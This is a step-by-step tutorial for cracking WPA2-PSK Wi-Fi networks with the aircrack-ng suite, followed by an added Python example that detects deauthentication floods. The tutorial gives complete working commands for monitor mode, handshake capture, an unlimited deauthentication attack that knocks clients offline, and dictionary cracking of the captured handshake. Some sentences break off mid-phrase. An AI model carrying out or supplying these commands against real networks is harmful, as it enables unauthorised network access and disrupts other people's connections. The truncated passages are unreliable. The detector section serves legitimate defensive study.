This short tutorial walks you through cracking WPA2 networks that use
pre-shared keys, using the aircrack-ng suite of tools to assess Wi-Fi
network security. All of the necessary tools come preinstalled with the Kali
Linux distribution. The # in front of commands means that they have to
be executed as the root user, e.g. using
Wireless card into monitor mode
List all possible programs that could interfere with the wireless card. If
kill is specified, it will try to kill all of them.
# airmon-ng check kill
Enable monitor mode on an interface (here it’s wlan0) and check if it worked.
# airmon-ng start wlan0
List Wi-Fi networks and their BSSIDs, channels, etc.
# airodump-ng wlan0mon
Narrow the search down to a specific BSSID (MAC address).
# airodump-ng wlan0mon -d <BSSID>
Capture WPA2 handshake and write it to file (e.g.
to change interface name, if needed.
# airodump-ng -w handshake -c <channel> --bssid <BSSID> wlan0mon
Optional, in another terminal: simultaneously send deauthentication packets to clients on the network to capture the WPA2 handshake by forcing clients to reauthenticate. Without this step, it might take some time to capture the handshake.
# aireplay-ng --deauth 0 -a <BSSID> wlan0mon
After storing the handshake in e.g. handshake-01.cap, we can finally crack the
# aircrack-ng handshake-01.cap -w dictionary.txt
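Seen from the defender's side, the deauthentication step above shows up as a burst of 802.11 deauthentication frames against one BSSID. The following added example (not part of the original tutorial) parses such frames and flags bursts; the function names, the threshold of 10 frames per second, the radiotap framing of each packet and the sample frames are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

mac = lambda b: ":".join(f"{x:02x}" for x in b)

def parse_deauth(pkt):
    """Return (bssid, src, dst, reason) for a radiotap + 802.11 deauth frame, else None."""
    if len(pkt) < 8:
        return None
    rt_len = struct.unpack_from("<H", pkt, 2)[0]   # radiotap length field, little-endian
    frame = pkt[rt_len:]
    if rt_len < 8 or len(frame) < 26:              # 24-byte mgmt header + 2-byte reason code
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if (ftype, subtype) != (0, 12):                # management frame, subtype deauthentication
        return None
    reason = struct.unpack_from("<H", frame, 24)[0]
    return mac(frame[16:22]), mac(frame[10:16]), mac(frame[4:10]), reason

def detect_floods(packets, window=1.0, threshold=10):
    """packets: time-ordered (timestamp, raw_bytes). Returns {bssid: (burst_start, peak_count)}."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in packets:
        hit = parse_deauth(raw)
        if hit is None:
            continue
        q = recent[hit[0]]
        q.append(ts)
        while ts - q[0] > window:                  # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            start, peak = alerts.get(hit[0], (q[0], 0))
            alerts[hit[0]] = (start, max(peak, len(q)))
    return alerts

# Constructed sample traffic (locally administered MACs, not from a real capture).
def build_frame(fc0, dst, src, bssid, reason=7):
    radiotap = bytes([0, 0, 8, 0, 0, 0, 0, 0])     # minimal 8-byte radiotap header
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (radiotap + bytes([fc0, 0, 0, 0]) + raw(dst) + raw(src) + raw(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

AP, QUIET_AP, BCAST = "02:00:00:00:00:01", "02:00:00:00:00:aa", "ff:ff:ff:ff:ff:ff"
SAMPLE = [(0.0, build_frame(0xC0, "02:00:00:00:00:02", QUIET_AP, QUIET_AP, 3)),  # lone deauth
          (0.5, build_frame(0x80, BCAST, AP, AP))]                               # beacon-type frame
SAMPLE += [(1.0 + i * 0.02, build_frame(0xC0, BCAST, AP, AP)) for i in range(40)]  # burst

if __name__ == "__main__":
    print(detect_floods(SAMPLE))
```

A single deauthentication frame is normal network behaviour, so the detector only reports a BSSID once the per-window count crosses the threshold; tune `window` and `threshold` to the baseline of the monitored network.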